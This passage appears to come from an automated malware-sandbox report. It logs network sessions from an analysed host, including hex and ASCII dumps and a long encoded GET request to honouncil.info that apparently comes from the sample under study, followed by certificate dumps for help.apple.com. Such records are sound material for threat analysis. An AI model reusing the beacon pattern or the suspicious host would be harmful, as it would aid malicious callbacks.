Jan 16, 2018 10:38:44.338227987 MEZ	68	IN	Data Raw: 1c 17 a1 c2 ce d0 74 17 c3 b1 90 ad 8d 6d 18 ef 9a 08 29 97 15 51 cb 7e 24 77 6b d6 63 7b 99 28 75 c7 b8 ac df d6 df 19 bc 98 9c d7 9b 83 20 ef 39 1e cb 15 a9 d0 d3 67 9b 07 3d 8b a2 f5 7a 3d 2e a4 2c 38 da fc 18 ed 74 8d 48 cd a2 9c 70 be 20 74 Data Ascii: tm)Q~$wkc{(u 9g=z=.,8tHp t~<p,P%$MLPus7C'9!^X!,XHcd5;cnfpUp[GiYR%yuG`Zo@K2xNo"k^~FN=ZAx^;!+&=

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.0.53	49202	104.28.13.190	80

Timestamp	kBytes transferred	Direction	Data
Jan 16, 2018 10:38:44.345383883 MEZ	72	OUT	GET /?r=9jc3i8XAbBPh_SVJQUQMiFWKWE9RYEK6JViGhaUYGHAYT3PiZABNyX3y-tKFjbgD5_8POTdplyBinajb97o1If7zCzR18UCtQ2i4ObCx2dpWKhG2VCVNdWJqFMjFRYYt2ESeWm24gTzYVGMNbOgzf6qV92lBPjYi4S_ReFM5CiSC6aQGX9sMdWYckHXKG4mSk-pgf__svmzjvNx5TioAqNDZnyT3dcYL7ftr0__I1T2vujIgXH7cHolsvyPM0mL1_SwfyLc5BCaSgKtFU8zWVyrQ8xC3Hq8ez3uJWtCToFXhwT-Zs5K0QRPoeDldKoE8X0sovErtC7bbeT3T7-_VX1bbzRGcT9ujraFOhWJTPSCVTHJf_jFq2p6NSwpM26PPeBS2NpWwIs-n266MLXRGM75xjcGz2ybVRLqegEoN226KJRhhLtVjA-c2ddfJuPbMjEWRn7jwfSOFRAuszW1dfWR5oc0H2KdsHMZaH9BCv2jIkWIPLdbko7gbUe7jCuX5E_wiYbc3wjmy903wKiLxWHJDabVoSkuLP9auX3UKJQuBFvs_Ty95UEKIxBmHC50R1Crcsq47rSej7DWUXaqrCJgYAGw0SHYYP5ADY75FV6jrT5C2YyDtlDygzej-m9DNRDJq268rTdsYGLV-QwU3-Y-jyxjGmxMwiv_upoVtRcqyQLhgb4igduxcdGdHHoXd4NQUkYWVZJTDfzZh5u1Rv71kn9HvgQfNaOASkVj0XOEeWaBYWnsXqbvdCMkB6jz0XzUbyhsPxc99zI1E90ULe96RA1qtZPlqZdErF3anES4m0zrwVxm1qsgPT6zxaWbb3FUn_Kaot4AHNRhOO6CRXJxXwhZlqaG8LHC1kxQBtYVrSrhGSrr8a_BaM-XInpz7eXcLyK0mlfMtNft0fGtT7dISjExcsKlBzWydT96ywKN2oPNJjkcugIq5i9bm06O-cY-z04cv5SBSi14T7OgvEpB5um58n7YJwDJ2QEsC6EoQNazIOo71kNEkaKKCV6Ekv7YNftsWvpy250pHzPWBxarogcPd0gaj7TEQfsHz5eqFAEO1sOrAkwdEGxNu6ge3R_qWWiIQOA98DNEFTBgJ7b2_s2GsZW4mbCp-rixraV_uri9qoedvIFnPvniH7Go3gFloOHShzrs7nNRR-r7JpqJR1FjdHBzPMxjEcoAQVfrSmI1CzcKggc5RCZXKTIHrrJnu93wZCyjpvaKE3RUht4yTXheGObENnkRacxfgvlzZN0YH1eShf66CBcPkhnHhFE0S0YG208sFCNK0tjDf6zheVt&rc=BqMgjlsMm3tV1CEJfnpu_ebhe2OIsxR5XR78bmQQiB6QSUMtNRVhaM8M7HEiFGA5YjQG57-NQdzD-RRpg7juNdTLmyVsBfwj78wtq8n7S6gNg6pZypTfLH9Y9htvekk8V5CBwOTy9aKuM5JMQNWKAVjYKL2-w6gGtP0mrRBCZIeb_h3SQQUCOuxAPwGBsL5GIiGE_AsD4B1bpSDEIhoZ-xjaQEXet-rNnJXVHzNGRDUNF_0mlBtzcRdghWUchiR7A1HCiwWNrC9xWx4WK7_NtcBuwKc0Cp6h8cjeQ3AdixWTNMQO4Zu2DG4pNRAKmuBcexYOFTaeybEoWjRl-2qIYv3HL3_-yetV21wcLlKJx2RomE6Z4BmLTyqquDw8OgTess3BUyN1Im0JXp_aCDLKnFWagN-MMQ34WHJ5pHcUbAz6evWuPYV8E9lQG9D2s4iBu1VjYJx5prgbE4_GD7iKHYLOdvO-4QooTbO4HVaj2cd_ReZCbJRRMcsAqOSAtA1kOBnGp5F92CaEtGcaStTZg3WJYs5_p_EGNJx8D2o91yFcX3ouSQP8Nn2Y2iwn-Bprp_44gCrujY1zLbdqmLftbIP9AMHJwJ8peIFoXcB3HqRO0cqhYPoFyoLi5Hu-XVmqwWLnrWqrysXOTmbsAEEXlmJQvbtKW5xocW1MquPyl7GZDIrFTkqyQm7PQN8F8n2wftEif0vBnjovnIxk2C_QwTltf6rL3JnMSnehPis98O9z0ucE_3h1oIRZZB6CF2WUoTPSZxPxz9SO5x4lDo9epw2nAubj6D_y7DaxpqYejNVIkdGpUnfvEHjs2krZgoPgGcWuexDpnF81_AZLW7jOMgcACSSfyOfwdxqlcXOmugBajX3n4iFY3p7GnNkmXJOUmiHMHz3mqB0b0-mgv7IDILtMClKoam2iujYBmvzusCzOPEYkGEQqz7WbsAe9cDIZw-Jp16QilUlcWuhBUPpl5JP4uHxOm4JfCDBwnhXXU0qhPwEp7Q8PUqs_1Hb9WeLb40_2JsDoCX-r-dYB8abAlKr5D_44IifVXDnvFhpvSrt2rgE10AYyyEat1FpkYZbLM3Sv61XuwumVfnUNWXTL69rM3QCoUShJssyiAeVIdb76tb-pdGP5Yo5YgXU9aan1CMyGmoYYbnciv-LBXFHcGHowqSn1Y-4SUaDGSJ1ltfMTtZLo4E_zDCicCyi6ghTHtkO51eQoTEOXOitQiMr4SvLgm58dQqxsOeOIRgxSCNUz2D5hX5YXa8q68FZHZJQBAvAooYSMT3e3D3u9v24v2hSIE3MYUFMlUqQt_Iz9jenSsC_edC1PDjAMxSkNUblt5NZRsAohzGOJMTz7E9xuA3QIR4bYjdIu6RoHYZClwyfmZyBFmZq_KP879ZZq4DVTnKhljYHq4TneawJJPdIMd-8KWH4mqINb_MSstjnIRIYOzi7oFBx--CmaXC-b65iteRtIfcPruZ9XAL6dEy2I9ACr_EU08_6RQXGNyqP3veHhJh1ZT9K4tYyT1Z5xfcpb4zHys7-puzfkETJjmr3kTUYlAtF7LdmeHbchwW2_uZrcxquCvVXYAB2CKjAKwZOkv2KFljRMqb8oVZZIYVe7B0HVej0e0Wgup2s0FOlnNrAupNGipghTg64qTg4D1M9LpgV6j1JLH1zpSrV4bYxNjRBOWLbpzz9JNnYWAM8Afp2-y84 HTTP/1.1 Host: honouncil.info User-Agent: Content-Type: application/x-www-form-urlencoded Connection: keep-alive Accept-Encoding: gzip Cookie: __cfduid=d21c3132781a381126e775d3d6d90ee091516095522
Jan 16, 2018 10:38:45.302794933 MEZ	75	IN	HTTP/1.1 403 Forbidden Date: Tue, 16 Jan 2018 09:38:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Chl-Bypass: 1 Cache-Control: max-age=2 Expires: Tue, 16 Jan 2018 09:38:46 GMT X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 3de01a86808f3ea4-ZRH Content-Encoding: gzip Data Raw: 37 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db b6 16 fe ee 5f 71 aa 02 db 97 c8 b2 d3 b7 d4 91 54 a4 59 87 e5 e2 5e 2c d8 1a dc 15 43 61 d0 d4 91 c4 98 22 35 92 f2 cb 76 f7 df 2f 48 4a b6 2c 3b 69 53 cc f9 12 92 87 0f cf 79 78 de a8 f8 d9 0f 3f 5f 7f fc 74 fb 01 4a 53 f1 74 14 3f 0b c3 df 59 0e dc c0 cd 07 78 f3 39 85 d8 2e 00 e5 44 eb 24 10 32 bc d7 c0 f0 35 48 9e 31 0c 80 13 51 24 01 8a f0 ee d7 20 85 f8 d9 ef 28 32 96 7f 0e c3 3d 54 8b 03 70 1a ea cd d3 a0 2e 1e 81 ba 78 02 54 61 5a 34 3b 71 ca ca 63 94 30 3c 44 2a 91 64 e9 28 36 cc 70 4c af 8c 41 61 98 14 f0 0b fe d1 30 85 d9 33 f8 1f 5c 73 d9 64 39 27 0a e3 c8 cb 8d e2 0a 0d 01 41 2a 4c 02 4a 6a 43 4b 12 2e b6 35 d1 3a 00 96 1d cf 45 dd 16 5a 12 a5 d1 24 c1 dd c7 1f c3 8b de 42 69 4c 1d da 43 57 49 70 2d 85 d5 23 fc b8 ad 31 00 ea 47 49 60 70 63 22 6b e2 e5 0e e6 31 94 df c2 bb ab f0 5a 56 35 31 6c c1 fb 40 37 1f 92 0f 59 81 67 b4 54 b2 c2 64 da 03 f0 26 29 b9 90 46 f7 76 08 c9 44 86 9b 33 10 32 97 9c cb f5 d1 96 15 c3 75 2d 95 e9 6d 5a b3 cc 94 49 86 2b 46 31 74 83 33 26 98 61 84 87 9a 12 8e c9 f4 ac 22 1b 56 35 55 37 f6 a8 9c 89 25 28 e4 49 a0 cd 96 a3 2e 11 4d 4b 6b 3e f7 53 21 b5 ac 96 0a f3 24 88 68 26 42 5a b0 c8 2f 45 34 1f a3 52 52 e9 b1 13 32 db 1a 5b ee dc b8 c2 8c 91 24 d0 54 21 8a b3 5a c9 7b a4 f6 ca fd d9 07 91 f3 f6 73 fa b0 32 df ef 95 61 68 f5 f9 fe 8b fa 30 7c ba 4a 87 de ea 20 87 fb d3 85 cc b6 7f 55 44 15 4c cc 26 97 35 c9 32 26 8a d9 e4 ef d8 ab d0 37 0b 3b bb 34 55 ac 36 7d a8 7b b2 22 7e 36 00 ad 68 df 10 37 ab a3 fb 3f 1a 54 db 71 c5 c4 f8 5e 07 69 dc 2e a4 0f c4 a6 3b 6b 3a 69 a3 f3 9b 4e fc 13 6b 23 4f 1d 38 0c e3 6f 01 a7 f9 98 ca aa 92 03 f0 d1 68 14 47 6d 5a b0 cc a6 23 80 38 63 ab d6 03 c3 b5 22 75 8d 2a b0 f3 ed 4a 9b 72 68 1e 12 8e ca 40 f7 4f e8 2e de 0e a9 94 4b 86 7e dc fa b2 9f 71 72 01 64 c4 90 d0 28 22 34 27 06 6d c2 22 0b 8e 73 2f a4 83 f4 96 23 d1 08 7e 1a da e9 71 1c 65 6c d5 d3 a3 d5 d0 9d 12 66 68 08 e3 36 8a 77 da 1d 2c 0c 0c 39 32 a5 5d b6 da 5b 36 fc 7f 1e 41 ae 50 d9 80 df 6d b5 b9 7c 7a 64 04 2d 09 e7 28 0a 9c 5b 00 ce 04 06 e9 cf 02 a1 92 0a 41 1b ac e3 a8 9c f6 21 ce 7b c7 eb 66 b1 df 15 eb 9a 88 63 7c 59 d5 1c 0d ce 35 d2 39 2d 91 2e 77 44 75 4b 60 4a 04 8d b4 51 cc 6c c1 c9 80 91 40 28 45 ad e3 c8 c2 a6 50 4a 21 1b 41 19 1f 33 91 cb 38 2a cf 77 94 38 82 ad bb 41 34 6e 59 b0 fe e6 57 4f f3 a6 7d f0 3a de 58 51 72 56 94 ce 23 ba 9a 60 f3 23 61 a2 47 fc 43 d4 f7 04 8e 44 a8 e4 4d 25 34 98 b5 3c 10 7b 40 70 20 73 30 38 da b2 53 3b 64 62 85 ca d2 99 87 b9 54 55 a8 0d a1 4b cc 06 68 0e c2 ae ef 30 ba 8b 77 bb 5a 7f 1f cc 11 c7 52 2f 2c 79 44 cb e5 bc 65 c9 26 45 53 ca 2c 09 0a 34 ee b8 6f 0e f1 ee 5c 1b e5 ad 0b 39 08 21 55 45 78 00 7e 4e 91 6d 12 bc c8 70 32 25 17 af 2f 26 17 f9 0b 24 2f 03 20 7a 2b a8 97 d0 cc e0 12 b7 49 f0 fa df f9 7b b6 f9 74 77 65 7f ef cb ec a7 ad f8 f1 ee e6 3f 57 73 4d 5e ea f0 37 fd af 95 b8 37 c5 fb 49 3f a7 1c 72 5c 84 0a 3b 43 d3 5d 10 c7 42 b6 36 b6 71 bc eb 22 a4 5c 56 44 2d fb a1 dc ad 59 8f ed a5 a2 d4 1d e3 d2 7e 5b 80 67 f0 62 72 5e 6f 0e a2 bc e7 78 2c 57 a4 42 4f 9f ed 1e f4 2c 8a d6 eb f5 b8 90 b2 e0 68 13 64 b4 d3 35 22 35 8b 72 c2 f9 82 d0 e5 bb 65 f2 d5 44 80 3b 64 21 55 86 2a 09 26 01 68 aa 24 e7 cc b6 66 42 06 a7 f4 bd 84 12 ad 0b ce 5e 9e bb 91 df 1c 3a c9 19 08 29 f0 d2 52 e7 d5 3f 0c d7 7e 58 0e 91 27 0f 60 c1 42 Data Ascii: 799Xmo_qTY^,Ca"5v/HJ,;iSyx?_tJSt?Yx9.D$25H1Q$ (2=Tp.xTaZ4;qc0<Dd(6pLAa03\sd9'ALJjCK.5:EZ$BiLCWIp-#1GI`pc"k1ZV51l@7YgTd&)FvD32u-mZI+F1t3&a"V5U7%(I.MKk>S!$h&BZ/E4RR2[$T!Z{s2ah0\|J UDL&52&7;4U6}{"~6h7?Tq^i.;k:iNk#O8ohGmZ#8c"uJrh@O.K~qrd("4'm"s/#~qelfh6w,92][6APm\|zd-([A!{fc\|Y59-.wDuK`JQl@(EPJ!A38w8A4nYWO}:XQrV#`#aGCDM%4<{@p s08S;dbTUKh0wZR/,yDe&ES,4o\9!UEx~Nmp2%/&$/ z+I{twe?WsM^77I?r\;C]B6q"\VD-Y~[gbr^ox,WBO,hd5"5reD;d!U*&h$fB^:)R?~X'`B
Jan 16, 2018 10:38:45.302805901 MEZ	76	IN	Data Raw: 1a 23 ab 19 4c dd 69 1c 73 33 83 f3 57 f6 ff b6 b0 82 db da 15 57 3f 52 4e c3 56 ce 92 52 28 d9 88 6c 06 cf f3 b7 f6 af 3b 6a 06 d3 7a 03 5a 72 96 c1 73 3a b5 7f 3b 2d 14 c9 58 a3 67 f0 a2 de 5c f6 33 82 f5 70 a2 90 38 67 e8 39 4c a8 50 d7 52 68 Data Ascii: #Lis3WW?RNVR(l;jzZrs:;-Xg\3p8g9LPRhY95/{T#d:7ZP?;Q7]0fQ1W?kN\nwut4p;t)== :lmzam@zX/VkMX

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Jan 16, 2018 10:38:29.453325987 MEZ	443	49191	23.45.113.221	192.168.0.53	CN=help.apple.com, OU=Internet Services for Akamai, O="Apple, Inc.", L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Dec 13 01:00:00 CET 2017	Wed Apr 25 14:00:00 CEST 2018	[[ Version: V3 Subject: CN=help.apple.com, OU=Internet Services for Akamai, O="Apple, Inc.", L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 28212234923293811559293907981389074848330617022269508064890273798726526061178910937145241113987324413234406631328280079563901086823471249099691247130062009737570294251458507659469303543943206449870692653797216523661122047558559683425184585210593019346881727992795019311747849541041938465674323220584217704219274322066195592204943000146428841048736618981986171033366523800789268404491284647231271677694001853536098636080572397344369871599464455557097006020983280827215261377384734523304865556936283910120577084131672290815218639088078585708742079795718401908964578736665345514238066664770669334905942295111890292828173 public exponent: 65537 Validity: [From: Wed Dec 13 01:00:00 CET 2017, To: Wed Apr 25 14:00:00 CEST 2018] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 074555dd 94de1b01 62746380 9924c20d]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 E8 04 82 01 E4 01 E2 00 75 00 A4 B9 09 ...........u....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 60 51 4C FD 7A 00 00 04 03 00 46 30 44 02 20 14 `QL.z.....F0D. .0040: F0 29 B8 83 E8 B3 FB EB DC B9 2A 57 78 5F 33 D5 .)........Wx_3.0050: 25 E9 01 DB 21 D1 F9 2C 7E 60 01 BD CF A1 88 02 %...!..,.`......0060: 20 44 80 AA D3 BD 3E 37 44 F3 0A 97 13 C3 B9 6B D....>7D......k0070: 85 13 16 B6 6B 7D A1 AA 8F 2C 24 17 67 90 FA D5 ....k....,$.g...0080: 01 00 77 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 BD ..w.V.../.......0090: 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 55 D.>.Fv....\....U00A0: D6 89 D0 DD 00 00 01 60 51 4C FE 9B 00 00 04 03 .......`QL......00B0: 00 48 30 46 02 21 00 D5 4A F2 E8 B6 00 A9 8F 3A .H0F.!..J......:00C0: F2 1A 57 8E EA 97 FC 3A 4E AD 43 F9 96 DB 04 0A ..W....:N.C.....00D0: 90 37 97 29 52 B4 0E 02 21 00 F2 95 49 1D B9 F9 .7.)R...!...I...00E0: E2 BE AB 58 AC 3C CD 7F B6 D8 62 D7 0C 65 84 71 ...X.<....b..e.q00F0: C6 0F 0E 99 8F 42 BB F8 FB 41 00 77 00 EE 4B BD .....B...A.w..K.0100: B7 75 CE 60 BA E1 42 69 1F AB E1 9E 66 A3 0F 7E .u.`..Bi....f...0110: 5F B0 72 D8 83 00 C4 7B 89 7A A8 FD CB 00 00 01 _.r......z......0120: 60 51 4D 00 57 00 00 04 03 00 48 30 46 02 21 00 `QM.W.....H0F.!.0130: CD 5E 68 71 55 FF 56 8B 6B CD FE 96 64 AD 3D 3F .^hqU.V.k...d.=?0140: 1E 11 98 99 ED CD BE 07 10 18 1C C9 EE 68 47 7E .............hG.0150: 02 21 00 C0 F3 AB 76 EA 42 28 FD 52 BC F4 5C F0 .!....v.B(.R..\.0160: EA 4A 88 7C 4C B6 20 57 DC 46 1A DA 14 CE AF 8F .J..L. W.F......0170: 20 95 EA 00 77 00 BB D9 DF BC 1F 8A 71 B5 93 94 ...w.......q...0180: 23 97 AA 92 7B 47 38 57 95 0A AB 52 E8 1A 90 96 #....G8W...R....0190: 64 36 8E 1E D1 85 00 00 01 60 51 4C FE 37 00 00 d6.......`QL.7..01A0: 04 03 00 48 30 46 02 21 00 86 0B 42 74 6E 82 E3 ...H0F.!...Btn..01B0: 71 3C 35 08 6E C6 0B 21 B1 A1 8F A3 92 EC E0 48 q<5.n..!.......H01C0: 7E A3 77 4B 76 A8 58 1F 4D 02 21 00 EB 68 51 1C ..wKv.X.M.!..hQ.01D0: BA 14 DB D7 47 1D 7F A3 15 9A B6 1B E3 0F 1B F6 ....G...........01E0: 1C 38 F5 B4 25 20 75 8A 50 0A 71 00 .8..% u.P.q.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: helposx.apple.com DNSName: prohelp.apple.com DNSName: help.apple.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 34 06 FD F5 0A 41 93 AB C1 15 BD 12 A5 F0 B5 49 4....A.........I0010: D2 41 40 7D .A@.]]] Algorithm: [SHA256withRSA] Signature:0000: 5D FA 62 A9 06 65 FF 97 3A 8A 85 C3 82 4E D8 44 ].b..e..:....N.D0010: AA E7 96 3E 2D 2E 20 16 A9 14 15 B9 B1 22 24 46 ...>-. ......"$F0020: 56 BE 02 59 B8 F5 38 7F A4 8E 03 36 62 B1 DB 8E V..Y..8....6b...0030: EB 53 01 50 59 A2 FA B9 CC 2B 7F CA 39 62 A0 0F .S.PY....+..9b..0040: 53 00 98 7B 15 34 4B 6E 8A 6F CC 5C E6 26 2D 97 S....4Kn.o.\.&-.0050: EE 8C 13 FD 14 33 5A 6A 00 A8 E7 67 11 DB BA 69 .....3Zj...g...i0060: 15 87 F4 DE BF AC 94 92 E3 3C 80 67 0C BE 60 88 .........<.g..`.0070: C2 8B 53 36 95 E2 85 DB C9 34 73 69 92 01 AE 6D ..S6.....4si...m0080: 80 C2 BC 77 85 DA F0 18 5E 85 0B 01 4F 91 25 75 ...w....^...O.%u0090: CC FC F0 B7 1E 46 4C 2F 8D 2B C9 0C 25 02 FE 94 .....FL/.+..%...00A0: 3E 2A A3 77 37 6D F2 5C 78 69 58 91 AA 72 98 14 >.w7m.\xiX..r..00B0: 7D 5D AB 79 5F DD 48 99 5A 8B 50 91 99 F4 6D 6A .].y_.H.Z.P...mj00C0: 27 8D 2A B9 76 8C 40 51 D3 C7 79 5E C4 2C C2 67 '.*.v.@Q..y^.,.g00D0: 39 0B 81 60 D0 1E 34 FD 34 06 29 8F 7B E8 A1 0E 9..`..4.4.).....00E0: 9D D6 B4 F7 5C F1 98 17 20 75 7A B6 D4 84 87 DD ....\... uz.....00F0: 4B 0A 83 24 00 7F 14 7B F0 DC 59 1D 47 92 6D F7 K..$......Y.G.m.]
Jan 16, 2018 10:38:29.453325987 MEZ	443	49191	23.45.113.221	192.168.0.53	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028	[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]
Jan 16, 2018 10:38:29.489674091 MEZ	443	49192	23.45.113.221	192.168.0.53	CN=help.apple.com, OU=Internet Services for Akamai, O="Apple, Inc.", L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Dec 13 01:00:00 CET 2017	Wed Apr 25 14:00:00 CEST 2018	[[ Version: V3 Subject: CN=help.apple.com, OU=Internet Services for Akamai, O="Apple, Inc.", L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 28212234923293811559293907981389074848330617022269508064890273798726526061178910937145241113987324413234406631328280079563901086823471249099691247130062009737570294251458507659469303543943206449870692653797216523661122047558559683425184585210593019346881727992795019311747849541041938465674323220584217704219274322066195592204943000146428841048736618981986171033366523800789268404491284647231271677694001853536098636080572397344369871599464455557097006020983280827215261377384734523304865556936283910120577084131672290815218639088078585708742079795718401908964578736665345514238066664770669334905942295111890292828173 public exponent: 65537 Validity: [From: Wed Dec 13 01:00:00 CET 2017, To: Wed Apr 25 14:00:00 CEST 2018] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 074555dd 94de1b01 62746380 9924c20d]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 E8 04 82 01 E4 01 E2 00 75 00 A4 B9 09 ...........u....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 60 51 4C FD 7A 00 00 04 03 00 46 30 44 02 20 14 `QL.z.....F0D. .0040: F0 29 B8 83 E8 B3 FB EB DC B9 2A 57 78 5F 33 D5 .)........Wx_3.0050: 25 E9 01 DB 21 D1 F9 2C 7E 60 